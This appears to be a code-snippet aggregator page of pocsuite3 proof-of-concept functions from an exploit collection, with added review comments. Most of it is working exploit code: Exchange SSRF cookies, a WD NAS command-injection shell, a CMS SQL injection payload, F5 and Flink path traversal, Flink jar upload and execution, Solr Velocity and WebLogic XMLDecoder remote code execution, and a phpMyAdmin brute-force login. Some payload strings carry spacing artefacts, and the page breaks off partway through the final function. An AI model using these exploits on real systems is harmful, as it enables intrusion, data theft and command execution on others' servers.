These are examples of the Python API pocsuite3.api.requests.get taken from open-source projects. Voting an example up indicates that it is especially useful and appropriate.
Source : bt_unauth_access_phpmyadmin.py
with GNU General Public License v3.0
from 78778443
def exploit(self, mode) -> dict:
    """Probe ``scheme://host:888/pma/`` for an exposed phpMyAdmin instance.

    The host and scheme come from ``self.url``; the port is hard-coded to
    888, so any port present in ``self.url`` is ignored. The target is
    reported only when the page answers 200 *and* the body contains
    "phpmyadmin" (a status code alone is not taken as evidence).

    Args:
        mode: not used by this method; accepted for the caller's interface.

    Returns:
        A dict with ``VerifyInfo['URL']`` set on a match, otherwise empty.
    """
    result = {}
    url_pr = urlparse(self.url)
    scheme = url_pr.scheme
    host = url_pr.hostname
    # Fixed port regardless of what self.url carries.
    port = 888
    vul_url = "{}://{}:{}/pma/".format(scheme, host, port)
    # No try/except here: a connection error propagates to the caller.
    resp = requests.get(vul_url, timeout=5)
    if resp.status_code == 200 and "phpmyadmin" in resp.text:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = vul_url
    return result
def _verify(self):
Source : check_http_status.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Record the target as reachable unless it answers 404.

    One GET of ``self.url`` with certificate verification disabled; any
    status other than 404 is stored, with the status code as ``PoC``.
    Request failures are logged and leave ``result`` empty.

    Returns:
        Whatever ``self.parse_output`` makes of the ``result`` dict.
    """
    result = {}
    url = self.url
    try:
        # verify=False: certificate problems must not mask an alive host.
        resp = requests.get(url, verify=False, timeout=5)
        if resp.status_code != 404:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
            result['VerifyInfo']['PoC'] = str(resp.status_code)
    except Exception as ex:
        # Broad catch: any network error is reported, not raised.
        logger.error(str(ex))
    return self.parse_output(result)
def _attack(self):
Source : CVE-2021-21972.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Check the CVE-2021-21972 pre-conditions on a vSphere Client host.

    Two GETs: the site root must mention ``/vsphere-client`` and the vROps
    plugin's ``uploadova`` path must answer 405 (endpoint present, GET not
    allowed). Only endpoint presence is tested; nothing is uploaded.
    Errors are logged and yield an empty result.
    """
    result = {}
    try:
        vul_url = urljoin(
            self.url, "/ui/vropspluginui/rest/services/uploadova")
        # NOTE(review): neither request passes a timeout, unlike most other
        # PoCs on this page; a slow target can stall the scan unless the
        # framework applies a global timeout — confirm.
        resp1 = requests.get(self.url)
        resp2 = requests.get(vul_url)
        if '/vsphere-client' in resp1.text and resp2.status_code == 405:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
    except Exception as e:
        logger.error(e)
    return self.parse_output(result)
def _attack(self):
Source : CVE-2021-26855.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Check for the Exchange SSRF signature of CVE-2021-26855.

    A single GET of ``/owa/auth/x.js`` with the backend-selection cookies;
    a 500 whose body contains ``NegotiateSecurityContext`` is taken as the
    vulnerable signature. Both conditions are required — a bare 500 is not
    evidence. Errors are logged and leave ``result`` empty.
    """
    result = {}
    try:
        vul_url = urljoin(self.url, "/owa/auth/x.js")
        headers = {
            'Cookie': 'X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;'
        }
        resp = requests.get(vul_url, headers=headers, timeout=10)
        if resp.status_code == 500 and 'NegotiateSecurityContext' in resp.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
    except Exception as e:
        logger.error(e)
    return self.parse_output(result)
def _attack(self):
Source : fofacms.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Fingerprint the target's CMS from its front page.

    Fetches ``self.url`` and passes the body to ``self.fingerprint``; a
    non-empty answer is stored as ``VerifyInfo['Info']``. Request errors
    are logged and leave ``result`` empty.
    """
    result = {}
    target = self.url
    try:
        # NOTE(review): no timeout is passed on this request.
        resp = requests.get(target).text
        cms_info = self.fingerprint(resp)
        if cms_info != "":
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target
            result['VerifyInfo']['Info'] = cms_info
    except Exception as ex:
        logger.error(str(ex))
    return self.parse_output(result)
def parse_output(self, result):
Source : node_red_unauthorized_rce.py
with GNU General Public License v3.0
from 78778443
def need_auth(url):
    """Return 1 when ``<url>/settings`` answers 401 (authentication required), else 0."""
    status = requests.get("{}/settings".format(url)).status_code
    return 1 if status == 401 else 0
def login(url, username="admin", password="password"):
Source : phpmyadmin_burst.py
with GNU General Public License v3.0
from 78778443
def pma_login(self, url, username, password) -> bool:
    """Try one phpMyAdmin form login and report whether it succeeded.

    Loads the login page to harvest ``set_session`` and ``token``, posts
    the credentials together with the page's cookies, and treats a
    ``pmaAuth-1`` cookie in the reply as success. Up to two attempts are
    made; any exception (network error, missing form field) moves on to
    the next attempt.

    Returns:
        True when ``pmaAuth-1`` is set in the response cookies, else False.
    """
    for i in range(2):
        try:
            # NOTE(review): the page fetch has no timeout; only the POST does.
            res = requests.get(url)
            cookies = dict(res.cookies)
            # re.search(...).group(1) raises AttributeError when a field is
            # absent; that is caught below and counts as a failed attempt.
            data = {
                'set_session': html.unescape(re.search(r"name=\"set_session\" value=\"(.+?)\"", res.text, re.I).group(1)),
                'token': html.unescape(re.search(r"name=\"token\" value=\"(.+?)\"", res.text, re.I).group(1)),
                'pma_username': username,
                'pma_password': password,
            }
            res = requests.post(url, cookies=cookies, data=data, timeout=3)
            cookies = dict(res.cookies)
            return 'pmaAuth-1' in cookies
        except:
            # NOTE(review): bare except also swallows KeyboardInterrupt and
            # SystemExit; `except Exception:` is the safer form.
            pass
    return False
def get_word_list(self):
Source : unauthorized-check.py
with GNU General Public License v3.0
from 78778443
def elasticsearch(self, ip):
    """Probe ``http://<ip>:9200/_cat`` for an Elasticsearch API reachable without auth.

    Returns:
        A description string when ``/_cat/master`` appears in the body,
        False when it does not, and None (implicitly) when the request
        raises — callers cannot distinguish "closed" from "not vulnerable".
    """
    try:
        url = 'http://' + ip + ':9200/_cat'
        r = requests.get(url, timeout=5)
        if '/_cat/master' in r.content.decode():
            return ip + ":9200 elasticsearch未授权"
        return False
    except Exception as e:
        # NOTE(review): errors are dropped silently (no log, no return value).
        pass
def zookeeper(self, ip):
Source : unauthorized-check.py
with GNU General Public License v3.0
from 78778443
def CouchDB(self, ip):
    """Probe ``http://<ip>:5984/_utils/`` for a CouchDB console reachable without auth.

    Returns:
        A description string when ``couchdb-logo`` appears in the body,
        False when it does not, and None (implicitly) when the request
        raises.
    """
    try:
        url = 'http://' + ip + ':5984'+'/_utils/'
        r = requests.get(url, timeout=5)
        if 'couchdb-logo' in r.content.decode():
            return ip + ":5984 CouchDB未授权"
        return False
    except Exception as e:
        # NOTE(review): errors are dropped silently (no log, no return value).
        pass
def docker(self, ip):
Source : unauthorized-check.py
with GNU General Public License v3.0
from 78778443
def docker(self, ip):
    """Probe ``http://<ip>:2375/version`` for a Docker API reachable without auth.

    Returns:
        A description string when ``ApiVersion`` appears in the body,
        False when it does not, and None (implicitly) when the request
        raises.
    """
    try:
        url = 'http://' + ip + ':2375'+'/version'
        r = requests.get(url, timeout=5)
        if 'ApiVersion' in r.content.decode():
            return ip + ":2375 docker api未授权"
        return False
    except Exception as e:
        # NOTE(review): errors are dropped silently (no log, no return value).
        pass
def Hadoop(self, ip):
Source : unauthorized-check.py
with GNU General Public License v3.0
from 78778443
def Hadoop(self, ip):
    """Probe ``http://<ip>:50070/dfshealth.html`` for a Hadoop NameNode UI reachable without auth.

    Returns:
        A description string when ``hadoop.css`` appears in the body,
        False when it does not, and None (implicitly) when the request
        raises.
    """
    try:
        url = 'http://' + ip + ':50070'+'/dfshealth.html'
        r = requests.get(url, timeout=5)
        if 'hadoop.css' in r.content.decode():
            return ip + ":50070 Hadoop未授权"
        return False
    except Exception as e:
        # NOTE(review): errors are dropped silently (no log, no return value).
        pass
def _attack(self):
Source : wd_nas_login_bypass_rce.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Verify the WD NAS login bypass plus command injection via ``DsdkProxy.php``.

    A GET to ``network_mgr.cgi`` is issued first (presumably required before
    the POST — confirm against the original advisory), then ``DsdkProxy.php``
    is POSTed with a forged admin cookie and a read-only ``cat /proc/cpuinfo``.
    CPU-info keywords in the reply mark the host as vulnerable. Request
    failures are logged as warnings and leave ``result`` empty.
    """
    result = {}
    veri_url1 = urljoin(self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
    veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
    cmd = 'cat /proc/cpuinfo'
    data = "';{};'".format(cmd)
    headers = {'cookie': 'isAdmin=1;username=admin'}
    try:
        # NOTE(review): neither request passes a timeout.
        requests.get(veri_url1)
        resp = requests.post(veri_url2, data=data, headers=headers)
        if any(keyword in resp.text for keyword in ['Processor', 'BogoMIPS', 'Hardware', 'Revision']):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
    except Exception as e:
        # NOTE(review): logger.warn is the deprecated alias of logger.warning.
        logger.warn(str(e))
    return self.parse_verify(result)
def _attack(self):
Source : wd_nas_login_bypass_rce.py
with GNU General Public License v3.0
from 78778443
def _shell(self):
    """Send the user-supplied ``command`` option through the same path as ``_verify``.

    The response is discarded: nothing is returned or recorded, and only
    request errors are logged (as warnings).
    """
    veri_url1 = urljoin(self.url, '/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1')
    veri_url2 = urljoin(self.url, '/web/dsdk/DsdkProxy.php')
    cmd = self.get_option("command")
    data = "';{};'".format(cmd)
    headers = {'cookie': 'isAdmin=1;username=admin'}
    try:
        requests.get(veri_url1)
        requests.post(veri_url2, data=data, headers=headers)
    except Exception as e:
        # NOTE(review): logger.warn is the deprecated alias of logger.warning.
        logger.warn(str(e))
def parse_verify(self, result):
Source : ShellShock_Bash_RCE.py
with GNU General Public License v3.0
from 78778443
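def get_url(url):
    """Return the URL a GET of ``url`` finally lands on (after redirects).

    Args:
        url: the URL to resolve.

    Returns:
        The resolved URL, or ``url`` unchanged when the request fails.
    """
    try:
        return requests.get(url).url
    except Exception:
        # Was a bare `except:`, which also swallowed KeyboardInterrupt/SystemExit.
        return url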
def fix_url(url):
Source : ShellShock_Bash_RCE.py
with GNU General Public License v3.0
from 78778443
def is_url_exist(url) -> bool:
    """Return True only when a GET of ``url`` answers 404.

    Any other status, and any request failure, yields False.

    NOTE(review): the name suggests the opposite meaning; ``get_link`` in
    this file relies on the current semantics, so confirm intent before
    changing it.
    """
    try:
        status = requests.get(url).status_code
    except Exception:
        return False
    return status == 404
def isSameDomain(url1, url2):
Source : shiziyuCMS_sqli.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Verify the shiziyuCMS error-based SQL injection in ``get_goods_detail``.

    Appends the ``updatexml`` payload to ``self.url`` and, when the reply
    carries an XPATH syntax error, extracts the database name echoed
    between ``~`` markers. There is no try/except: request errors propagate.
    """
    result = {}
    payload = r"index.php?s=apigoods/get_goods_detail&id=1%20and%20updatexml(1,concat(0x7e,(database()),0x7e),1)"
    # NOTE(review): plain concatenation — self.url must end with '/' for
    # this to form a valid path.
    url = self.url + payload
    r = requests.get(url, verify=False)
    if "XPATH syntax error" in r.text:
        regx = re.findall(r'XPATH syntax error: .*?\r\n', r.text)
        # NOTE(review): regx[0] raises IndexError when the error line is not
        # CRLF-terminated; the outer `in` check does not guarantee that.
        dbname = re.findall(r'~.*?~', regx[0])[0]
        result['VerifyInfo'] = {}
        result['Database'] = {}
        result['Database']['DBname'] = dbname.strip('~')
        result['VerifyInfo']['URL'] = url
    return self.parse_output(result)
def _attack(self):
Source : springboot_actuator_all_unauthorized.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Look for Spring Boot Actuator and Swagger endpoints served without auth.

    Each actuator endpoint is tried under each candidate prefix ('',
    'actuator', 'moniter'); a 200 whose body parses as JSON counts as
    exposed. Once a prefix yields anything the remaining prefixes are
    skipped. The Swagger/api-docs paths are then tried directly under the
    base URL. Every hit is joined into ``extra['evidence']``.
    All request and parse errors are swallowed.
    """
    result = {}
    # Candidate path prefixes and endpoint names:
    dir_path = ('', 'actuator', 'moniter')
    dir_file_list = ('mappings', 'metrics', 'beans', 'configprops', 'env')
    api_filie_list = ('swagger-ui.html', 'api-docs', 'v2/api-docs')
    result_verified_url = []
    # Test Spring Boot actuator endpoints
    for path in dir_path:
        for file_name in dir_file_list:
            url_list = []
            url_list.append(self.url)
            if not self.url.endswith('/'):
                url_list.append('/')
            if path:
                url_list.append(path + '/')
            url_list.append(file_name)
            url = ''.join(url_list)
            try:
                # NOTE(review): no timeout on this request.
                r = req.get(url)
                if r.status_code == 200:
                    try:
                        # A real actuator endpoint answers with JSON
                        json.loads(r.text)
                        result_verified_url.append(
                            '{}/{}'.format(path, file_name))
                    except:
                        # Non-JSON 200 (e.g. a catch-all page) is not a hit.
                        pass
            except:
                # NOTE(review): bare except; `except Exception:` is safer.
                pass
        # Usually only one web prefix is configured, so stop after the
        # first prefix that produced results.
        if len(result_verified_url) > 0:
            break
    # Test api / swagger endpoints:
    for file_name in api_filie_list:
        if self.url.endswith('/'):
            url = self.url + file_name
        else:
            url = self.url + '/' + file_name
        try:
            r = req.get(url)
            if r.status_code == 200:
                result_verified_url.append(file_name)
        except:
            pass
    if len(result_verified_url) > 0:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = self.url
        result['extra'] = {}
        result['extra']['evidence'] = '\r\n'.join(result_verified_url)
    return self.parse_attack(result)
def _attack(self):
Source : f5-CVE-2020-5902_all_rce.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Verify the F5 BIG-IP TMUI path traversal (CVE-2020-5902).

    Uses the port from ``self.url`` (default 443) and tries http then https.
    A 200 from the ``getTabSet.jsp`` bypass URL marks the host; the
    ``fileRead.jsp`` read of ``/etc/group`` is then stored as evidence.
    Every exception is swallowed so the next scheme is tried.
    """
    result = {}
    pr = urlparse(self.url)
    if pr.port:
        ports = [pr.port]
    else:
        ports = [443]
    for port in ports:
        for schema in ['http','https']:
            try:
                # check bypass
                url_check = '{}://{}:{}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=test5902'.format(schema,pr.hostname,port)
                r_test = req.get(url_check,verify=False)
                # check fileRead.jsp
                if r_test.status_code == 200:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, port)
                    url_read = '{}://{}:{}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/group'.format(schema,pr.hostname,port)
                    r_read = req.get(url_read,verify = False)
                    if r_read.status_code == 200:
                        result['extra'] = {}
                        result['extra']['evidence'] = r_read.content.decode('utf-8').strip()
                    # First matching scheme wins.
                    break
            except:
                # NOTE(review): bare except; `except Exception:` is safer.
                pass
    return self.parse_attack(result)
def _attack(self):
Source : flink-CVE-2020-17518_1.11.2_rce.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Verify the Apache Flink 1.11.2 jar-upload RCE (CVE-2020-17518).

    Sequence per port: read the web upload directory from
    ``/jobmanager/config``, POST a jar whose file name points into that
    directory, run it with a ``touch`` of a randomly named log file, and
    finally GET that log file back — a 200 is the success signal.
    Note that a run leaves artefacts on the target (the uploaded ``.jar``
    and the touched log file), and that the bare ``except: raise`` aborts
    the whole scan on the first request error instead of moving on.
    """
    result = {}
    pr = urlparse(self.url)
    if pr.port:
        ports = [pr.port]
    else:
        ports = [8081]
    for port in ports:
        try:
            # get flink web path
            url_check = '{}://{}:{}/jobmanager/config'.format(pr.scheme, pr.hostname, port)
            r_test = req.get(url_check, verify=False)
            if r_test.status_code == 200:
                m = re.findall(b'/tmp/flink-web-(.+?)"',r_test.content)
                if not m:
                    continue
                # upload jars
                random_jars = '{}.jar'.format(random.randint(10000,100000))
                flink_upload_pathfile = '/tmp/flink-web-{}/flink-web-upload/{}'.format(m[0].decode('utf-8'),random_jars)
                upload_files = {'jarfile': (flink_upload_pathfile, base64.b64decode('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'))}
                url_upload = '{}://{}:{}/jars/upload'.format(pr.scheme, pr.hostname, port)
                r_upload = req.post(url_upload,files=upload_files,verify=False)
                # A 400 here is the expected reply on the affected version.
                if r_upload.status_code != 400:
                    continue
                # execute
                random_log = 'flink--standalonesession-0-{}.log'.format(random.randint(10000,100000))
                url_exeucte = '{}://{}:{}/jars/{}/run?entry-class=Execute&program-args="touch $FLINK_HOME/log/{}"'.format(
                    pr.scheme, pr.hostname, port,random_jars,random_log)
                r_execute = req.post(url_exeucte, verify=False)
                # check log exists:
                if r_execute.status_code != 400:
                    continue
                url_log_exist = '{}://{}:{}/jobmanager/logs/{}'.format(pr.scheme, pr.hostname, port,random_log)
                r_exist = req.get(url_log_exist, verify=False)
                if r_exist.status_code == 200:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}:{}'.format(
                        pr.hostname, port)
                    break
        except:
            # NOTE(review): re-raising here stops the port loop; the sibling
            # PoC (CVE-2020-17519) swallows errors instead.
            raise
    return self.parse_attack(result)
def _attack(self):
Source : flink-CVE-2020-17519_1.11.2_fileread.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Verify the Apache Flink 1.11.2 JobManager log directory traversal (CVE-2020-17519).

    Requests ``/jobmanager/logs/`` with a double-encoded ``../`` sequence
    reaching ``/etc/group``; a 200 whose body starts with ``root:x:0`` is
    the success signal and the body is kept as evidence. Port comes from
    ``self.url`` or defaults to 8081. Exceptions are swallowed.
    """
    result = {}
    pr = urlparse(self.url)
    if pr.port:
        ports = [pr.port]
    else:
        ports = [8081]
    for port in ports:
        try:
            url_check = '{}://{}:{}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fgroup'.format(
                pr.scheme, pr.hostname, port)
            r_test = req.get(url_check, verify=False)
            if r_test.status_code == 200 and re.findall(b'^root:x:0', r_test.content):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = '{}:{}'.format(
                    pr.hostname, port)
                result['extra'] = {}
                result['extra']['evidence'] = r_test.content.decode(
                    'utf-8').strip()
        except:
            # NOTE(review): bare except; `except Exception:` is safer.
            pass
    return self.parse_attack(result)
def _attack(self):
Source : hikvision-2013-4976_web_login-bypass.py
with GNU General Public License v3.0
from 78778443
def check(uri):
    """Probe ``<uri>/doc/page/main.asp`` with the CVE-2013-4976 anonymous cookie.

    Args:
        uri: scheme://host[:port] of the device.

    Returns:
        ``(True, url)`` when the body contains both ``playback.asp`` and the
        main-frame div marker, otherwise ``(False, reason)``; connection
        errors, read timeouts and any other exception are reported as the
        reason rather than raised.
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'}
    timeout = 5
    url = '{}/doc/page/main.asp'.format(uri)
    cookies = {'userInfo80': 'YW5vbnltb3VzOlwxNzdcMTc3XDE3N1wxNzdcMTc3XDE3Nw=='}
    try:
        r = req.get(url, headers=headers, cookies=cookies, timeout=timeout)
        # NOTE(review): the second marker has a space after '<' (looks like a
        # page-extraction artefact); it will not match real markup — confirm
        # against the original source.
        if b'playback.asp' in r.content and b' < div id="mainFrame">' in r.content:
            return True, url
        else:
            return False, 'No server page find'
    except req.exceptions.ConnectionError:
        return False, 'ConnectionError'
    except req.exceptions.ReadTimeout:
        return False, 'ReadTimeout'
    except Exception as e:
        return False, str(e)
class TestPOC(POCBase):
Source : iis-ms15-034_7_rce.py
with GNU General Public License v3.0
from 78778443
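def _verify(self):
    """Check an IIS host for MS15-034 (HTTP.sys Range-header handling).

    ``check`` first requires the ``Server`` header to name IIS or
    Microsoft-HTTP, then ``test_ms15_034`` sends the oversized ``Range``
    request; a 'Requested Range Not Satisfiable' body marks the host as
    unpatched. The port comes from ``self.url`` or defaults to 80.

    Returns:
        ``self.parse_output`` of a dict carrying ``VerifyInfo['URL']`` on a hit.
    """
    def check(url):
        """Return (status, message); status is True only when test_ms15_034 matched."""
        Server_Tag = ['Microsoft-HTTP', 'Microsoft-IIS']
        try:
            Request_Tmp = req.get(url)
            # A missing Server header raises KeyError, handled generically below.
            remote_server = Request_Tmp.headers['server']
            # Fixed: the original tested a bare generator expression, which is
            # always truthy, so non-IIS servers were never filtered out.
            if any(tmp_tag in remote_server for tmp_tag in Server_Tag):
                return test_ms15_034(url)
            else:
                return (False, 'Web Service Is Not IIS\n[+] May Be ' + remote_server)
        except req.exceptions.ConnectTimeout:
            return (False, 'timeout')
        except Exception as e:
            return (False, '{}'.format(str(e)))
    def test_ms15_034(url):
        """Send the MS15-034 probe and classify the reply body."""
        Req_headers = {'Host': 'stuff',
                       'Range': 'bytes=0-18446744073709551615'}
        Request = req.get(url, headers=Req_headers)
        if b'Requested Range Not Satisfiable' in Request.content:
            return (True, Request.content)
        elif b'The request has an invalid header name' in Request.content:
            return (False, 'The vulnerability has been fixed!')
        else:
            return (False, 'The IIS service was unable to display the vulnerability exists, the need for manual testing!')
    result = {}
    pr = urlparse(self.url)
    if pr.port:
        ports = [pr.port]
    else:
        ports = [80]
    for port in ports:
        try:
            url = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
            status, msg = check(url)
            if status:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = '{}:{}'.format(
                    pr.hostname, port)
                break
        except Exception:
            # Narrowed from a bare except so Ctrl-C still stops the scan.
            pass
    return self.parse_output(result)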
def _attack(self):
Source : iis-shortname_6_disclosure.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Check for the IIS 6 tilde short-name disclosure.

    ``check`` requests a short-name wildcard that should exist (``*~1*``)
    and one that should not (``1ndex*~1*``), first with GET then with
    OPTIONS; a 404 for the first and a non-404 for the second means the
    server reveals short names. Port comes from ``self.url`` or 80.
    """
    # reference from https://github.com/lijiejie/IIS_shortname_Scanner/blob/master/iis_shortname_Scan.py
    def check(url):
        """Return True when the existing/non-existing wildcard pair differs in status."""
        url1 = url + '/*~1*/index99.aspx' # an existed file/folder
        url2 = url + '/1ndex*~1*/index99.aspx' # not existed file/folder
        try:
            # GET:
            r1 = req.get(url1)
            status_1 = r1.status_code
            r2 = req.get(url2)
            status_2 = r2.status_code
            if status_1 == 404 and status_2 != 404:
                return True
            # OPTIONS:
            r1 = req.options(url1)
            status_1 = r1.status_code
            r2 = req.options(url2)
            status_2 = r2.status_code
            if status_1 == 404 and status_2 != 404:
                return True
            return False
        except Exception as e:
            # Any request failure is treated as "not disclosed".
            return False
    result = {}
    pr = urlparse(self.url)
    if pr.port:
        ports = [pr.port]
    else:
        ports = [80]
    for port in ports:
        try:
            url = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
            status = check(url)
            if status:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = '{}:{}'.format(
                    pr.hostname, port)
                break
        except:
            # NOTE(review): bare except; `except Exception:` is safer.
            pass
    return self.parse_output(result)
def _attack(self):
Source : solr_8.3.1_rce.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Verify the Solr 8.3.1 VelocityResponseWriter RCE.

    Per port: list cores via ``/solr/admin/cores``, POST a config change to
    the first core that enables the params resource loader, then GET a
    Velocity template that runs ``echo d0xdeadbeaf``; ``0xdeadbeaf`` in
    the reply is the success signal. Note that the config change is a
    persistent modification of the target core, and that there is no
    try/except — JSON/IndexError on an empty core list propagates.
    """
    result = {}
    pr = urlparse(self.url)
    if pr.port:
        ports = [pr.port]
    else:
        ports = [8983]
    for port in ports:
        target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
        # Fetch any core of the target instance
        target1 = target + "/solr/admin/cores?indexInfo=false&wt=json"
        headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:73.0) Gecko/20100101 Firefox/73.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                   "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Referer": self.url, "Upgrade-Insecure-Requests": "1"}
        res1 = req.get(target1, headers=headers)
        core = json.loads(res1.content.decode())
        core2 = core['status'].keys()
        # NOTE(review): IndexError when the instance has no cores.
        core3 = list(core2)[0]
        # Modify the core's config to enable params.resource.loader.enabled
        target2 = target + "/solr/" + core3 + "/config"
        post_json = {"update-queryresponsewriter": {"class": "solr.VelocityResponseWriter", "name": "velocity",
                                                    "params.resource.loader.enabled": "true", "solr.resource.loader.enabled": "true", "startup": "lazy", "template.base.dir": ""}}
        res2 = req.post(target2, headers=headers, json=post_json)
        # With the loader enabled, a GET carrying the template expression executes the command
        target3 = target + "/solr/" + core3 + \
            "/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27echo%20d0xdeadbeaf%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
        response = req.get(target3, headers=headers)
        if response and response.status_code == 200 and "0xdeadbeaf" in response.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = '{}:{}'.format(
                pr.hostname, port)
            break
    return self.parse_output(result)
def _attack(self):
Source : weblogic-console-2020-14882_all_rce.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Verify the WebLogic console authentication bypass (CVE-2020-14882).

    ``check_console`` confirms ``/console/`` answers 200; only then does
    ``check_weblogic_console_page`` request the ``%252e%252e`` traversal
    URL and look for the ``HomePage1`` marker, returning the footer
    version string as evidence. Ports tried: the one in ``self.url``, or
    7001, 17001 and 27001.
    """
    headers = {
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}
    def check_console(target):
        """Return (True, body) when /console/ answers 200, else (False, reason)."""
        if not target.startswith('http'):
            target = 'http://{}'.format(target)
        url = '{}/console/'.format(target)
        try:
            r = req.get(url, headers=headers, verify=False, timeout=5)
            if r.status_code == req.codes.ok:
                if 'Deploying application for /console/...' in r.text:
                    # Console app is still starting; give it a moment.
                    time.sleep(2)
                return (True, r.text.strip())
            elif r.status_code == 404:
                return (False, '404')
            else:
                return (False, r.status_code)
        except req.exceptions.ReadTimeout:
            return (False, 'timeout')
        except Exception as ex:
            return (False, str(ex))
    def check_weblogic_console_page(target):
        """Return (True, version-or-'') when the traversal URL reaches HomePage1, else (False, reason)."""
        s = req.session()
        console_url = '/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1'
        if not target.startswith('http'):
            target = 'http://{}'.format(target)
        url = '{}{}'.format(target, console_url)
        try:
            # get session cookies
            r = s.get(url, allow_redirects=False)
            # 302 to portal
            if r.status_code == 302:
                r = s.get(url)
            if r.status_code == 200 and 'id="HomePage1"' in r.text:
                # NOTE(review): the pattern has spaces after '<' (looks like a
                # page-extraction artefact) and will not match real markup.
                m = re.findall(
                    ' < p id="footerVersion">(.*?) < /p>', r.text)
                if m:
                    return (True, m[0])
                else:
                    return(True, '')
            return (False, '')
        except req.exceptions.ReadTimeout:
            return (False, 'timeout')
        except Exception as ex:
            return (False, str(ex))
    '''
    verify:
    '''
    result = {}
    pr = urlparse(self.url)
    if pr.port: # and pr.port not in ports:
        ports = [pr.port]
    else:
        ports = [7001, 17001, 27001]
    for port in ports:
        uri = "{0}://{1}:{2}".format(pr.scheme, pr.hostname, str(port))
        status, msg = check_console(uri)
        if status:
            status, msg = check_weblogic_console_page(uri)
            if status:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = uri
                result['extra'] = {}
                result['extra']['evidence'] = msg
                break
    return self.parse_output(result)
def _attack(self):
Source : weblogic-wls-2017-10271_all_rce.py
with GNU General Public License v3.0
from 78778443
def _verify(self):
    """Verify the WebLogic WLS-WSAT XMLDecoder deserialization (CVE-2017-10271).

    A random 8-letter ``flag`` is written by the payload into
    ``bea_wls_internal/<flag>.txt`` on the target; ``verify_result`` then
    fetches that file and checks the flag is present. A 500 from the
    ``CoordinatorPortType`` POST is the signal that the payload was
    processed. Note the probe leaves ``<flag>.txt`` on the target.
    Ports tried: the one in ``self.url``, or 7001, 17001 and 27001.
    """
    flag = "".join(random.choice(string.ascii_letters)
                   for _ in range(0, 8))
    output_file = '{}.txt'.format(flag)
    '''
    payload的格式化
    '''
    # Build the XMLDecoder SOAP envelope that writes the flag to output_file.
    def payload_command():
        # NOTE(review): the '< string>' / '< /string>' spacing looks like a
        # page-extraction artefact; confirm against the original source.
        command_filtered = " < string>{} < /string>".format(flag)
        payload_1 = '''
< soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
< soapenv:Header> < work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
< java>
< java version="1.6.0" class="java.beans.XMLDecoder">
< object class="java.io.PrintWriter">
< string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{} < /string>
< void method="println">{} < /void> < void method="close"/>
< /object>
< /java>
< /java>
< /work:WorkContext>
< /soapenv:Header> < soapenv:Body/> < /soapenv:Envelope>'''.format(output_file, command_filtered)
        return payload_1
    '''
    检查结果
    '''
    # Fetch the written file and check for the flag.
    def verify_result(target):
        headers = {
            'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'}
        # Append a timestamp so a cached copy from a previous run is not served
